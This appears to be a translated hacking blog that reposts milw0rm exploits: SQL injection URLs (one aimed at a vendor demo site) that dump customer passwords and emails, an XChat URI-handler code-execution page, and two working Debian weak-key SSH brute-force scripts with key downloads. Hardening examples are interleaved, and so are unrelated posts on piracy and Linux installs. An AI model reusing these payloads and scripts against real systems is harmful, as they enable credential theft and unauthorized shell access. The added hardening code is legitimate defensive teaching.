Remote SQL injection

Posted by zerialkiller in exploits with 2 comments

## AUTHOR : JuDge

## AUTHOR Email:spamm3r@windowslive.com,eslamwaheed50@hotmail.com

## Script WebSite:http://www.eshop100.co.uk

##Dork::)

##DescRipTiON: pull customers info from database

##EXPLOITS:
www.victim.com/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*

##Demo:http://www.eshop100.co.uk/demo/index.php?CATEGORY=2&SUB=-1/**/union/**/select/**/0,1,2,password,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/customers/*

#AcmlmBoard v1.A2 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
#Dork: "AcmlmBoard v1.A2"
#
##
###
##
#
#This board software suffers from some incorrectly verified variables which are used in SQL queries.
#An attacker can easily get sensitive information from the database by
#injecting unexpected SQL queries.
#
#SQL Injection:
#http://[target]/[path]/memberlist.php?sort=&pow=[SQL]
#
#PoC:
#memberlist.php?sort=&pow=9%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16%20from%20users--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the neverdying h4ck-y0u Team!
#
#######################
#######################
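Both advisories above come down to the same defect: an integer query-string parameter (SUB in the first, pow in the second) is concatenated into a SQL statement unchanged, so a value beginning with -1 or 9 can continue the statement with a UNION SELECT that pulls columns from another table. The /**/ sequences in the first payload are inline comments standing in for spaces, worth remembering when writing detection rules, since a filter that only looks for spaces around union/select misses them. The example below is added here and is not code from either advisory or from the affected products; it uses Python with the standard-library sqlite3 module and a constructed two-table schema (products/customers, toy column names) to show the vulnerable concatenation next to the corrected version, which validates the parameter as an integer and binds it, so the same input can no longer alter the statement.

```python
import sqlite3


def build_db():
    """Create an in-memory shop database with constructed sample rows (toy schema, not eshop100's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, category INTEGER, sub INTEGER, name TEXT)")
    conn.execute("CREATE TABLE customers (id INTEGER, email TEXT, password TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?)",
                     [(1, 2, 1, "Widget"), (2, 2, 2, "Gadget"), (3, 3, 1, "Gizmo")])
    conn.executemany("INSERT INTO customers VALUES (?, ?, ?)",
                     [(1, "alice@example.test", "hash-alice"), (2, "bob@example.test", "hash-bob")])
    conn.commit()
    return conn


def products_vulnerable(conn, category, sub):
    """The pattern behind both advisories: request parameters pasted straight into the statement."""
    query = "SELECT name, sub FROM products WHERE category=%s AND sub=%s" % (category, sub)
    return conn.execute(query).fetchall()


def products_hardened(conn, category, sub):
    """Validate both parameters as integers, then bind them; the input can no longer change the statement."""
    try:
        category_id = int(category)
        sub_id = int(sub)
    except (TypeError, ValueError):
        raise ValueError("CATEGORY and SUB must be integers")
    return conn.execute(
        "SELECT name, sub FROM products WHERE category=? AND sub=?",
        (category_id, sub_id),
    ).fetchall()


# Constructed payload in the shape of the advisories: a non-matching id followed by a UNION
# that selects customer columns into the product result set.
UNION_PAYLOAD = "-1 UNION SELECT password, email FROM customers"


def demo():
    """Run the same input through both versions: (rows leaked by the vulnerable one,
    whether the hardened one rejected it, rows the hardened one returns for a normal id)."""
    conn = build_db()
    leaked = sorted(products_vulnerable(conn, "2", UNION_PAYLOAD))
    try:
        products_hardened(conn, "2", UNION_PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    normal = products_hardened(conn, "2", "1")
    return leaked, rejected, normal


if __name__ == "__main__":
    leaked, rejected, normal = demo()
    print("vulnerable query leaked:", leaked)
    print("hardened query rejected payload:", rejected)
    print("hardened query, SUB=1:", normal)
```

The hardened version gets its safety from two independent steps: int() rejects anything that is not a whole number before the database is involved, and the ? placeholder means the driver sends the value separately from the statement text, so even a string parameter would be compared as data rather than parsed as SQL.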

video on YouTube where he invites people to download music illegally

Posted by zerialkiller in Videos with 0 comments

Kid Rock has published a video on YouTube where he invites people to download music illegally, or in his own words, to steal music.
As if that were not enough, he then urges the public to steal anything they feel like: cars, gasoline, music and movies. "Whatever you need".

here is the link: KID ROCK --> steal everything you can

A Linux User's Guide for a Windows User

Posted by zerialkiller in linux, winbugs with 0 comments

Hi there, browsing the elhacker forum yesterday I came across this guide for beginners, or as the title says, for a Windows user =) well, here is the link

A Linux User's Guide for a Windows User

How to Install Back|Track 3

Posted by zerialkiller in install backtrack3 with 1 comment

First of all you need to have a partition already created. 4 GB is more than enough. Boot the BackTrack 3 live CD, open a shell and begin:

bt~#mkdir /mnt/backtrack3 ---> create a directory under /mnt
bt~#mount /dev/sda10 /mnt/backtrack3/ --> mount the partition we want to install to, /dev/sda10
bt~#mkdir /mnt/backtrack3/boot/ ---> create another directory
bt~#cp --preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,var} /mnt/backtrack3/ ---> install; this takes a few minutes

####----> once the copy has finished, we finish up with this. -----------####

bt~#mkdir /mnt/backtrack3/{mnt,proc,sys,tmp}
bt~#mount --bind /dev/ /mnt/backtrack3/dev/
bt~#mount -t proc proc /mnt/backtrack3/proc/
bt~#cp /boot/vmlinuz /mnt/backtrack3/boot/

To add it to GRUB, in my case I only had to edit the menu.lst file of my Debian install.

bt ~ # fdisk -l

Disk /dev/sda: 60.0 GB, 60011642880 bytes
255 heads, 63 sectors/track, 7296 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

Device Boot Start End Blocks Id System
/dev/sda1 * 1 34 273073+ 83 Linux
/dev/sda2 35 7296 58332015 5 Extended
/dev/sda5 35 642 4883728+ 83 Linux
/dev/sda6 643 1007 2931831 83 Linux
/dev/sda7 1008 1337 2650693+ 82 Linux swap
/dev/sda8 1338 1386 393561 83 Linux
/dev/sda9 1387 6019 37214541 83 Linux
/dev/sda10 6020 7296 10257471 83 Linux

Disk /dev/sdb: 123.5 GB, 123522416640 bytes
255 heads, 63 sectors/track, 15017 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes

Device Boot Start End Blocks Id System
/dev/sdb1 * 1 15017 120624021 7 HPFS/NTFS

As you can see, it was on /dev/sda10 where I installed Back|Track 3,
so:

I opened Debian's menu.lst file and edited it

#nano /boot/grub/menu.lst

title Back|track3
root (hd0,9)
kernel /boot/vmlinuz root=/dev/sda10 ro

That was more than enough to have Back|Track 3 on my hard disk.

here is the link to download BACK|TRACK3

Installing emesene

Posted by zerialkiller in install emesene, messenger on linux with 2 comments

emesene is a messaging client similar to MSN. Honestly, I personally still prefer Pidgin, but there are always more alternatives to try.

First we edit our sources.list

#pico /etc/apt/sources.list

And add the repositories.

deb http://apt.emesene.org/ ./
deb-src http://apt.emesene.org/ ./

Now:

#apt-get update

and now we install it.

#apt-get install emesene

And done.

Xchat <= 2.8.7b Remote Code Execution

Posted by zerialkiller in exploits with 0 comments

#################################################

#################################################
#
# Xchat <= 2.8.7b Remote Code Execution (tested on Windows XP SP1+SP2+SP3, IE6 & IE7 fully patched)
# Vendor : http://xchat.org/
# Affected Os : Windows *
# Risk : critical
#
# This bug is related to the URI Handler vulnerability but the approach is a bit different.
# We don't use any % or ../../../ as the other related bugs, just a single "
# According to the registry, when the IRCS:// URI is called, the command launched is :
# C:\Program Files\xchat\xchat.exe --existing --url="%1"
#
# The xchat --help option tells us :
# " --command=COMMAND :Send a command to existing xchat "
#
# So we add a simple " at the end of the URL and we're in business ?
# Yep =) ircs://blabla@3.3.3.3" --command "shell calc"
#
# Note: The victim needs to be connected to an irc server, and also needs IE * .
#
# Greetz: French/Quebec community, http://spiritofhack.net/
#
# "If in times like these you can talk about individual freedom, you're probably a terrorist"
#
# Poc: this only launches the calc, sky is the limit past this point.

<html>
<head><title>Welcome to my personal website</title></head>
<body>
<script>document.location='ircs://blabla@3.3.3.3" --command "shell calc"'</script>
</body>
</html>

###http://www.milw0rm.com/#####
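The root cause in the advisory above is that the registered handler builds a command line by pasting the untrusted URI into a quoted argument, --url="%1", so a " inside the URI closes that argument and whatever follows is parsed as further options. The Python example below is added here and is not code from the advisory or from XChat; it shows what a handler wrapper should do instead: validate the URI against a tight allowlist before it reaches any command line, and build the argument vector as a list so no shell or quote parsing takes place. The allowed character set, the length limit and the irc/ircs scheme check are assumptions for illustration; the --existing and --url options are the ones quoted in the advisory.

```python
from urllib.parse import urlsplit

# Assumed allowlist for illustration: the schemes the handler is registered for, and the
# characters a host[:port]/channel URI legitimately needs. Double quote, whitespace and '%'
# are deliberately absent, so neither the advisory's " trick nor an encoded variant passes.
ALLOWED_SCHEMES = {"irc", "ircs"}
ALLOWED_CHARS = set("abcdefghijklmnopqrstuvwxyz"
                    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                    "0123456789-._:/#@")
MAX_URI_LENGTH = 512  # assumed upper bound; real IRC URIs are far shorter


def validate_irc_uri(uri):
    """Accept only a plainly formed irc:// or ircs:// URI; raise ValueError for anything else."""
    if not uri or len(uri) > MAX_URI_LENGTH:
        raise ValueError("empty or oversized URI")
    bad = sorted({ch for ch in uri if ch not in ALLOWED_CHARS})
    if bad:
        raise ValueError("disallowed characters in URI: %r" % bad)
    parts = urlsplit(uri)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError("unsupported scheme: %r" % parts.scheme)
    if not parts.hostname:
        raise ValueError("URI has no host")
    return uri


def build_handler_argv(uri, exe="xchat"):
    """Return the argument vector a hardened handler would pass to the client.

    It is a list, not a shell string, so the URI is delivered as one argument regardless
    of its content; validation has already rejected anything that is not a plain URI.
    """
    return [exe, "--existing", "--url=" + validate_irc_uri(uri)]


def is_accepted(uri):
    """Convenience check: True if the URI would be handed to the client, False if rejected."""
    try:
        validate_irc_uri(uri)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # A normal URI passes and becomes a clean argument vector.
    print(build_handler_argv("ircs://irc.example.test:6697/#security"))
    # The advisory's string is rejected on the '"' and the spaces before it is parsed at all.
    print(is_accepted('ircs://blabla@3.3.3.3" --command "shell calc"'))
```

The order of the checks matters: the character allowlist runs before urlsplit, so the parser only ever sees input that cannot contain quoting or option syntax, and the scheme and host checks then confirm the remainder is actually an IRC URI rather than merely harmless.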

P2P =)

Posted by zerialkiller in ares on linux with 0 comments

Exploit SSH --> OpenSSL

Posted by zerialkiller in exploit OpenSSL with 1 comment

While paying a few visits to milw0rm I found:

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit

the debian openssl issue leads to there being only 65,536 possible ssh keys generated, because the only entropy is the pid of the process generating the key.

This means that the following perl script can be used with the precalculated ssh keys to brute force the ssh login. It works if such a key is installed on a non-patched debian or any other system manually configured to.

On an unpatched system, which doesn't need to be debian, do the following:

keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

2. Extract it to a directory

3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 bits, generated on an unpatched debian (this is the key this exploit will break)

4. Run the perl script and give it the location to where you extracted the bzip2 mentioned.

#!/usr/bin/perl
use strict;
use warnings;

# Number of private keys offered to ssh per connection attempt
my $keysPerConnect = 6;
my @a;

unless ($ARGV[1]) {
    print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
    print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
    print "By mm\@deadbeef.de\n";
    exit 0;
}

chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
# Walk the key directory; the precalculated private keys have purely numeric file names
while ($_ = readdir(A)) {
    chomp;
    next unless m,^\d+$,;
    push(@a, $_);
    if (scalar(@a) > $keysPerConnect) {
        system("echo " . join(" ", @a) . "; ssh -l root " . join(" ", map { "-i " . $_ } @a) . " " . $ARGV[1]);
        @a = ();
    }
}

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,
Markus Mueller
mm@deadbeef.de

# milw0rm.com [2008-05-15]

AND ALSO

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)

#!/usr/bin/env python
# Python 2 script (Queue module, print statements, os.popen3): run it with a Python 2 interpreter.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
############################################################################
# Author: hitz - WarCat team (warcat.no-ip.org)
# Collaborator: pretoriano
#
# 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
#    http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
#
# 2. Extract it to a directory
#
# 3. Execute the python script
#    - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5
#    - execute: python exploit.py (without parameters) to display the help
#    - if the key is found, the script shows something like that:
#      Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121
#      Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240
############################################################################

import Queue
import os
import string
import time
from threading import Thread
import sys

# This class only holds a boolean, which will be True once some thread finds the key
class End():
    def __init__(self):
        self.end = False

    def Finish(self):
        self.end = True

    def GetEnd(self):
        return self.end

# This is the thread class
class Connection(Thread):
    def __init__(self, QueueDir, TheEnd, dir, host, user, port='22'):
        Thread.__init__(self)
        self.QueueDir = QueueDir
        self.TheEnd = TheEnd
        self.dir = dir
        self.host = host
        self.user = user
        self.port = port

    def run(self):
        # Take keys off the shared queue until one works or the queue is empty
        while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()):
            key = self.QueueDir.get()
            cmd = 'ssh -l ' + self.user
            cmd = cmd + ' -p ' + self.port
            cmd = cmd + ' -o PasswordAuthentication=no'
            cmd = cmd + ' -i ' + self.dir + '/' + key
            cmd = cmd + ' ' + self.host + ' exit; echo $?'
            pin, pout, perr = os.popen3(cmd, 'r')
            pin.close()
            # To debug, uncomment the next line. This will show the errors reported by ssh
            #print perr.read()
            if pout.read().lstrip().rstrip() == '0':
                self.TheEnd.Finish()
                print ''
                print 'Key Found in file: ' + key
                print 'Execute: ssh -l%s -p%s -i %s/%s %s' % (self.user, self.port, self.dir, key, self.host)
                print ''

print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org'

if len(sys.argv) < 4:
    print './exploit.py <dir> <host> <user> [[port] [threads]]'
    print ' <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash'
    print ' <host>: The victim host'
    print ' <user>: The user of the victim host'
    print ' [port]: The SSH port of the victim host (default 22)'
    print ' [threads]: Number of threads (default 4) Too big a number is bad'
    sys.exit(1)

dir = sys.argv[1]
host = sys.argv[2]
user = sys.argv[3]

if len(sys.argv) <= 4:
    port = '22'
    threads = 4
else:
    if len(sys.argv) <= 5:
        port = sys.argv[4]
        threads = 4
    else:
        port = sys.argv[4]
        threads = sys.argv[5]

ListDir = os.listdir(dir)
QueueDir = Queue.Queue()
TheEnd = End()

# Queue every file in the key directory except the .pub public halves
for i in range(len(ListDir)):
    if ListDir[i].find('.pub') == -1:
        QueueDir.put(ListDir[i])

initsize = QueueDir.qsize()
tested = 0

for i in range(0, int(threads)):
    Connection(QueueDir, TheEnd, dir, host, user, port).start()

# Progress report every 5 seconds until a key is found or the queue is drained
while (not TheEnd.GetEnd()) and (not QueueDir.empty()):
    time.sleep(5)
    actsize = QueueDir.qsize()
    speed = (initsize - tested - actsize) / 5
    tested = initsize - actsize
    print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' % (tested, actsize, speed)

# milw0rm.com [2008-06-01]
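Both scripts above do the same thing: try each private key from the precomputed set until one authenticates. The defender's counterpart is to find such keys in authorized_keys files before anyone else does, which is what Debian's ssh-vulnkey tool and the openssh-blacklist fingerprint lists were for at the time. The Python example below is added here and is not code from either exploit or from those packages: it parses an authorized_keys file (including entries with a leading options field), computes the OpenSSH-style SHA256 fingerprint of each key blob, and flags any fingerprint that appears in a blocklist. The key blobs are built in the block from toy RSA parameters and the blocklist is derived from one of them; both are constructed stand-ins for real key material and a real list of known-weak fingerprints.

```python
import base64
import binascii
import hashlib
import struct

# Key types the parser recognises in an authorized_keys line.
KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256"}


def ssh_string(data):
    """Encode bytes as an SSH wire-format string: 4-byte big-endian length, then the payload."""
    return struct.pack(">I", len(data)) + data


def ssh_mpint(value):
    """Encode a non-negative integer as an SSH mpint, with a leading zero byte if the top bit is set."""
    raw = value.to_bytes((value.bit_length() + 8) // 8, "big")
    return ssh_string(raw)


def make_rsa_blob(e, n):
    """Build an ssh-rsa public key blob (RFC 4253 layout: "ssh-rsa", e, n). Toy numbers only here."""
    return ssh_string(b"ssh-rsa") + ssh_mpint(e) + ssh_mpint(n)


def fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint: base64 of the SHA-256 digest of the key blob, '=' padding removed."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode("ascii").rstrip("=")


def parse_authorized_keys(text):
    """Return (line_number, key_type, blob, comment) for each parseable key line.

    Blank lines, comments and entries whose base64 does not decode are skipped.
    """
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        # An options field (from="...", command="...", ...) may precede the key type.
        for idx, field in enumerate(fields):
            if field in KEY_TYPES and idx + 1 < len(fields):
                key_type = field
                encoded = fields[idx + 1]
                comment = " ".join(fields[idx + 2:])
                break
        else:
            continue
        try:
            blob = base64.b64decode(encoded, validate=True)
        except (binascii.Error, ValueError):
            continue
        entries.append((lineno, key_type, blob, comment))
    return entries


def audit_authorized_keys(text, blocklist):
    """Return (line_number, key_type, fingerprint, comment) for every key whose fingerprint is blocklisted."""
    flagged = []
    for lineno, key_type, blob, comment in parse_authorized_keys(text):
        fp = fingerprint(blob)
        if fp in blocklist:
            flagged.append((lineno, key_type, fp, comment))
    return flagged


# Constructed sample keys: toy RSA parameters, not real key material.
GOOD_BLOB = make_rsa_blob(65537, (1 << 255) + 18923)
WEAK_BLOB = make_rsa_blob(65537, (1 << 255) + 77761)

# Constructed stand-in for a real list of known-weak fingerprints.
WEAK_KEY_FINGERPRINTS = {fingerprint(WEAK_BLOB)}

# Constructed authorized_keys content: one clean key, one blocklisted key behind an options
# field, and one malformed entry to show the parser skipping bad base64.
SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample authorized_keys",
    "ssh-rsa %s alice@workstation" % base64.b64encode(GOOD_BLOB).decode("ascii"),
    'from="10.0.0.0/8" ssh-rsa %s backup@debian-etch' % base64.b64encode(WEAK_BLOB).decode("ascii"),
    "ssh-rsa not-base64!! broken-entry",
])


def demo():
    """Audit the constructed sample against the constructed blocklist."""
    return audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, WEAK_KEY_FINGERPRINTS)


if __name__ == "__main__":
    for lineno, key_type, fp, comment in demo():
        print("line %d: %s %s (%s) is on the weak-key list" % (lineno, key_type, fp, comment))
```

Matching on the fingerprint of the whole public key blob, rather than on the comment or file name, is what makes this usable against a real list: the comment is free text the key owner can change, while the blob is exactly what the server compares at authentication time.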